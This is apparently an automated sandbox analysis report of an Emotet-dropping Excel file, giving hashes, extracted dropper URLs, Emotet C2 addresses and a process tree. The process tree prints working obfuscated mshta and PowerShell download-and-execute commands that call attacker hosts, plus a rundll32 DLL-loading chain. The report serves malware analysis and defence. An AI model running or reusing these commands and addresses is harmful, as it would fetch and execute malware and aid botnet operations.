Analysis

  • max time kernel
    140s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    20-01-2022 10:08

General

  • Target

    93de92f3e2868b196ea53446264d69e9.xls

  • Size

    142KB

  • MD5

    93de92f3e2868b196ea53446264d69e9

  • SHA1

    5a222d7fc81852ec5fb1ca0abca5fb7810e97299

  • SHA256

    a1d4e9c497ec94e9c1182741b7096c47396c0057014747c17e618e82538eae72

  • SHA512

    e0e3a2ca736ff74a5d756867a8c0418415a0f74fbb134ff09da468fe20a11c105ad9a230b8b05b9b3b45967f5afaedf1243f1f451c078bdc96d04adca7cc994e

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fer.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/fer/fer.png

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\93de92f3e2868b196ea53446264d69e9.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1128
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:876
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1076
        • C:\Windows\SysWOW64\mshta.exe
          mshta http://0xb907d607/fer/fer.html
          3⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1656
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fer.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1216
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:924
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:904
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:1588
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mrskqk\ekre.goe",NCLhqXdiLc
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1888
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mrskqk\ekre.goe",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1820

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • memory/876-59-0x000007FEFB781000-0x000007FEFB783000-memory.dmp
      Filesize

      8KB

    • memory/1128-58-0x0000000075421000-0x0000000075423000-memory.dmp
      Filesize

      8KB

    • memory/1128-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1128-56-0x0000000070F71000-0x0000000070F73000-memory.dmp
      Filesize

      8KB

    • memory/1128-55-0x000000002F591000-0x000000002F594000-memory.dmp
      Filesize

      12KB

    • memory/1128-123-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1216-63-0x0000000002400000-0x000000000304A000-memory.dmp
      Filesize

      12.3MB

    • memory/1216-62-0x0000000002400000-0x000000000304A000-memory.dmp
      Filesize

      12.3MB

    • memory/1588-79-0x0000000000940000-0x0000000000976000-memory.dmp
      Filesize

      216KB

    • memory/1588-81-0x00000000009B0000-0x00000000009D6000-memory.dmp
      Filesize

      152KB

    • memory/1588-85-0x00000000024D0000-0x00000000024F6000-memory.dmp
      Filesize

      152KB

    • memory/1588-87-0x0000000002660000-0x0000000002686000-memory.dmp
      Filesize

      152KB

    • memory/1588-90-0x00000000028D0000-0x00000000028F6000-memory.dmp
      Filesize

      152KB

    • memory/1588-77-0x0000000000230000-0x0000000000256000-memory.dmp
      Filesize

      152KB

    • memory/1820-95-0x0000000000280000-0x00000000002A6000-memory.dmp
      Filesize

      152KB

    • memory/1820-97-0x0000000000850000-0x0000000000876000-memory.dmp
      Filesize

      152KB

    • memory/1820-99-0x00000000009A0000-0x00000000009C6000-memory.dmp
      Filesize

      152KB

    • memory/1820-101-0x0000000002370000-0x0000000002396000-memory.dmp
      Filesize

      152KB

    • memory/1888-92-0x0000000000260000-0x0000000000286000-memory.dmp
      Filesize

      152KB